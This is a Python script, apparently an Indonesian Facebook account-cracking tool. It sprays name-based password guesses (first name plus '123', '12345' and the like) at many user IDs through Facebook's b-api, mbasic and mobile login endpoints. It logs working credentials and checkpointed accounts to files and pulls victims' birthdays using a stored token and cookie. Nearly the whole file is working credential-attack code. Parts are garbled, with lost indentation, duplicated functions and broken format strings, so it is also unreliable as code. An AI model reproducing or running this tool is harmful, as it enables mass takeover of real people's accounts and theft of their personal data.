with ThreadPoolExecutor(max_workers=30) as coeg:
print(f"{B}{.} Contoh password {P}Anjink,kontrol,sayang")
asu = input(f"{B}{.} Buat sandi : {P}").split(",")
if len(asu) == "":
print(f"{B}{.}{M} Sandi tidak boleh kosong");exit()
started()
for user in id:
uid, name = user.split("<=>")
coeg.submit(mbasicc, uid, asu)
exit()
elif ter in ["d","D"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
started()

```

```

for user in id:
uid, name = user.split("<=>")
frist=name.split(" ")
if len(frist)>=6:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
elif len(frist)<=2:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
elif len(frist)<=3:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
else:
fii = [ "bismillah", "anjing", "indonesia", "sayang" ]
coeg.submit(mbasicc, uid, fii)
exit()

def kone():
print(f"{B}[1] Method B-api > {P}CEPAT")
print(f"{B}[2] Method Mbasic > {P}KALEM")
print(f"{B}[3] Method Mobile > {P}LAMBAT")

def started():
jalan(f"{B}[·]{P} Results {H}OK {P}tersimpan di {H}OK/{tanggal}")
jalan(f"{B}[·]{P} Results {K}CP {P}tersimpan di {K}CP/{tanggal}")
jalan(f"{B}[·] Jika tidak ada hasil mainkan mode pesawat")
jalan(f"{B}[·] Butuh kesabaran Crack nya lumayan lambat")
print(f"{B}======{P}")

def api(uid, fii):
try:
ua = open("ua", "r").read()
except IOError:
ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
global ok, cp, loop, token, cookie
sys.stdout.write(f"\r{B}[·] BAZ > {P} {loop}/{len(id)} {H}OK : {H}{len(ok)} {K}CP : {K}{len(cp)}");sys.stdout.flush()
for pw in fii:
pw = pw.lower()
headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
ses = requests.Session()
send = ses.get("https://b-api.facebook.com/method/auth.login?format=json&email="+str(uid)+"&password="+str(pw)+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_ty
headers=headers_)
if "session_key" in send.text and "EAAA" in send.text:
print(f"\r{B}----> {H}{uid}•{pw}")
ok.append("%s|%s"% (uid, pw))
open("OK/%s.json"%(tanggal), "a").write("%s|%s\n"%(uid, pw))
break
elif "www.facebook.com" in send.json()["error_msg"]:
try:
token = open('login/token.json','r').read()
cookie = {'cookie':open('login/cookie.json','r').read()}
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token), cookies=cookie).json()["birthday"]
month, day, year = ttl.split("/")
month = _bulan_[month]
print(f"\r{B}----> {H}{uid}•{pw}•{day} {month} {year}")
cp.append("%s|%s"% (uid, pw))
open("CP/%s.json"%(tanggal), "a").write("%s|%s|%s %s %s\n"%(uid, pw, day, month, year))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
cek_log(uid,pw,ua)
print(f"\r{B}----> {H}{uid}•{pw}")
cp.append("%s|%s"% (uid, pw))
open("CP/%s.json"%(tanggal), "a").write("%s|%s\n"%(uid, pw))
break
else:
continue

loop += 1

def apiiii(uid, fii):
try:
ua = open("ua", "r").read()
except IOError:
ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
global ok, cp, loop, token, cookie

sys.stdout.write(f"\r{B}[·] BAZ > {P} {loop}/{len(id)} {H}OK : {H}{len(ok)} {K}CP : {K}{len(cp)}");sys.stdout.flush()
for pw in fii:
pw = pw.lower()

```

```

headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
ses = requests.Session()
send = ses.get("https://b-api.facebook.com/method/auth.login?format=json&email="+str(uid)+"&password="+str(pw)+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_ty
headers=headers_)
if "session_key" in send.text and "EAAA" in send.text:
    print(f"\r{B}----> {H}{uid}•{pw}")
    ok.append("%s|%s"% (uid, pw))
    open("OK/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
    break
elif "www.facebook.com" in send.json()["error_msg"]:
    try:
        token = open('login/token.json','r').read()
        cookie = {'cookie':open('login/cookie.json','r').read()}
        ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token),cookies=cookie).json()["birthday"]
        month, day, year = ttl.split("/")
        month = _bulan_[month]
        print(f"\r{B}----> {H}{uid}•{pw}•{day} {month} {year}")
        cp.append("%s|%s"% (uid, pw))
        open("CP/%s.json"%(tanggal),"a").write("%s|%s|%s %s %s\n"%(uid, pw, day, month, year))
        break
    except (KeyError, IOError):
        day = (" ")
        month = (" ")
        year = (" ")
    except:pass
    print(f"\r{B}----> {H}{uid}•{pw}")
    cp.append("%s|%s"% (uid, pw))
    open("CP/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
    break
else:
    continue

loop += 1

def mbasic(uid, fii):
    try:
        ua = open("ua", "r").read()
    except IOError:
        ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
    global ok, cp, loop, token, cookie
    sys.stdout.write(f"\r{B}[.] BAZ > {P} {loop}/{len(id)} {H}OK : {H}{len(ok)} {K}CP : {K}{len(cp)}");sys.stdout.flush()
    for pw in fii:
        fii_gtg = {}
        pw = pw.lower()
        ses = requests.Session()
        ses.headers.update({"origin": "https://mbasic.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip, deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host": "mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8", "cache-control": "max-age=0", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded"})
        p = ses.get("https://mbasic.facebook.com/login/?next&ref=dbl&refid=8").text
        b = parser(p,"html.parser")
        bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
        for i in b("input"):
            try:
                if i.get("name") in bl:fii_gtg.update({i.get("name"):i.get("value")})
            except:continue
            except:pass
            fii_gtg.update({"email": uid,"pass": pw,"prefill_contact_point": "", "prefill_source": "", "prefill_type": "", "first_prefill_source": "", "first_prefill_type": "", "had_cp_prefilled": "false", "had_password_prefilled": "false", "is_smart_lock": "false", "fb_noscript": "true"})
            deku = ses.post("https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8",data=fii_gtg)
            if "c_user" in ses.cookies.get_dict().keys():
                kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;","")
                print(f"\r{B}----> {H}{uid}•{pw}")
                ok.append("%s|%s"% (uid, pw))
                open("OK/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
                break
            elif "checkpoint" in ses.cookies.get_dict().keys():
                try:
                    token = open('login/token.json','r').read()
                    cookie = {'cookie':open('login/cookie.json','r').read()}
                    with requests.Session() as ses:
                        ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token),cookies=cookie).json()["birthday"]
                        month, day, year = ttl.split("/")
                        month = bulan_ttl[month]
                        print(f"\r{B}----> {H}{uid}•{pw}•{day} {month} {year}")
                        cp.append("%s|%s"% (uid, pw))
                        open("CP/%s.json"%(tanggal),"a").write("%s|%s|%s %s %s\n"%(uid, pw, day, month, year))
                        break

```

```

except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
cek_log(uid,pw,ua)
print(f"\r{B}----> {H}{uid}•{pw}")
cp.append("%s|%s"%(uid, pw))
open("OK/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
break
else:
continue

loop += 1

def mbasicc(uid, fii):
try:
ua = open("ua", "r").read()
except IOError:
ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
global ok, cp, loop, token, cookie
sys.stdout.write(f"\r{B}[.] BAZ > {P} {loop}/{len(id)} {H}OK : {H}{len(ok)} {K}CP : {K}{len(cp)}");sys.stdout.flush()
for pw in fii:
fii_gtg = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://mbasic.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip, deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host": "mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&f&refid=8", "cache-control": "max-age=0", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://mbasic.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:fii_gtg.update({i.get("name"):i.get("value")})
else:continue
except:pass
fii_gtg.update({"email": uid,"pass": pw,"prefill_contact_point": "", "prefill_source": "", "prefill_type": "", "first_prefill_source": "", "first_prefill_type": "", "had_cp_prefilled": "false", "had_password_prefilled": "false", "is_smart_lock": "false", "_fb_noscript": "true"})
deku = ses.post("https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8",data=fii_gtg)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;","")
print(f"\r{B}----> {H}{uid}•{pw}")
ok.append("%s|%s"%(uid, pw))
open("OK/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open('login/token.json','r').read()
cookie = {'cookie':open('login/cookie.json','r').read()}
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token),cookies=cookie).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print(f"\r{B}----> {H}{uid}•{pw}•{day} {month} {year}")
cp.append("%s|%s"%(uid, pw))
open("CP/%s.json"%(tanggal),"a").write("%s|%s|%s %s %s\n"%(uid, pw, day, month, year))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print(f"\r{B}----> {H}{uid}•{pw}")
cp.append("%s|%s"%(uid, pw))
open("CP/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
break
else:
continue

loop += 1

def mobil(uid, fii):
try:
ua = open("ua", "r").read()
except IOError:
ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
global ok, cp, loop, token, cookie
sys.stdout.write(f"\r{B}[.] BAZ > {P} {loop}/{len(id)} {H}OK : {H}{len(ok)} {K}CP : {K}{len(cp)}");sys.stdout.flush()
for pw in fii:
fii_gtg = {}

```

```

pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://mobile.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip, deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host": "mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&f&refid=8", "cache-control": "max-age=0", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://mobile.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:fii_gtg.update({i.get("name"):i.get("value")})
else:continue
except:pass
fii_gtg.update({"email": uid,"pass": pw,"prefill_contact_point": "", "prefill_source": "", "prefill_type": "", "first_prefill_source": "", "first_prefill_type": "", "had_cp_prefilled": "false", "had_password_prefilled": "false", "is_smart_lock": "false", "_fb_noscript": "true"})
deku = ses.post("https://mobile.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lww=100&refid=8",data=fii_gtg)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print(f"\r{B}----> {H}{uid}*{pw}")
ok.append("%s|%s"%(uid, pw))
open("OK/%s.s.json"%(tanggal),"a").write("%s|\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open('login/token.json','r').read()
cookie = {'cookie':open('login/cookie.json','r').read()}
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token),cookies=cookie).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print(f"\r{B}----> {H}{uid}*{pw}*{day} {month} {year}")
cp.append("%s|%s"%(uid, pw))
open("CP/%s.s.json"%(tanggal),"a").write("%s|s|s %s %s\n"%(uid, pw, day, month, year))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
cek_log(uid,pw,ua)
print(f"\r{B}----> {H}{uid}*{pw}")
cp.append("%s|%s"%(uid, pw))
open("CP/%s.s.json"%(tanggal),"a").write("%s|s\n"%(uid, pw))
break
else:
continue

loop += 1

def mobill(uid, fii):
try:
ua = open("ua", "r").read()
except IOError:
ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
global ok, cp, loop, token, cookie
sys.stdout.write(f"\r{B}]{ BAZ > {P} {loop}/{len(id)} {H}OK : {H}{len(ok)} {K}CP : {K}{len(cp)}");sys.stdout.flush()
for pw in fii:
fii_gtg = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://mbasic.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip, deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host": "mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&f&refid=8", "cache-control": "max-age=0", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://mobile.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:fii_gtg.update({i.get("name"):i.get("value")})
else:continue
except:pass
fii_gtg.update({"email": uid,"pass": pw,"prefill_contact_point": "", "prefill_source": "", "prefill_type": "", "first_prefill_source": "", "first_prefill_type": "", "had_cp_prefilled": "false", "had_password_prefilled": "false", "is_smart_lock": "false", "_fb_noscript": "true"})
deku = ses.post("https://mobile.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lww=100&refid=8",data=fii_gtg)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print(f"\r{B}----> {H}{uid}*{pw}")
ok.append("%s|%s"%(uid, pw))

```

```

open("OK/%s.json"%(tanggal),"a").write("%s|s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open('login/token.json','r').read()
cookie = {'cookie':open('login/cookie.json','r').read()}
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token),cookies=cookie).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print(f"\r{B} |----> {H}{uid}•{pw}•{day} {month} {year}")
cp.append("%s|s"%(uid, pw))
open("CP/%s.json"%(tanggal),"a").write("%s|s|s %s %s\n"%(uid, pw, day, month, year))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print(f"\r{B}----> {H}{uid}•{pw}")
cp.append("%s|s"%(uid, pw))
open("CP/%s.json"%(tanggal),"a").write("%s|s\n"%(uid, pw))
break
else:
continue

loop += 1

def cek_log(uid,pw,ua):
mb = ("https://mbasic.facebook.com")
ses = requests.Session()
option = []
ses.headers.update({"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": mb,"content-type":
"application/x-www-form-urlencoded","user-agent": ua,"accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-
with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document","referer": mb+"/login/?
next&ref=dbl&f&refid=8","accept-encoding": "gzip, deflate","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
data = {}
ged = parser(ses.get(mb+"/login/?next&ref=dbl&f&refid=8", headers={"user-agent":ua}).text, "html.parser")
fm = ged.find("form",{ "method":"post"})
list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
for i in fm.find_all("input"):
if i.get("name") in list:
data.update({i.get("name"):i.get("value")})
else:
continue
data.update({"email":uid,"pass":pw})
run = parser(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
if "checkpoint" in ses.cookies:
form = run.find("form")
dtsg = form.find("input",{ "name":"fb_dtsg"})["value"]
jzst = form.find("input",{ "name":"jazoest"})["value"]
nh = form.find("input",{ "name":"nh"})["value"]
dataD = {"fb_dtsg": dtsg,"fb_dtsg": dtsg,"jazoest": jzst,"jazoest": jzst,"checkpoint_data":"","submit[Continue]":"Lanjutkan","nh": nh}
tempek = parser(ses.post(mb+form["action"], data=dataD).text, "html.parser")
ngew = [yy.text for yy in tempek.find_all("option")]
print(f"\r{P}{H}----> {B}{uid}•{pw}")
for opt in range(len(ngew)):
jalan(f"{U}{{B}}{str(opt+1)}{U}}{B}>>>>{U}{{B}}{ngew[opt]}{U}")
if "0" in str(len(ngew)):
jalan(f"{P}{{H}} Hore akunya tab yesss, silahkan di login ")
elif "login_error" in str(run):
jalan(f"\r{P}{H}----> {B}{uid}•{pw}")
else:
jalan(f"\r{P}{H}----> {B}{uid}•{pw}")

if __name__=="__main__":
os.system("clear")
mkdir_data_login()
menu()

```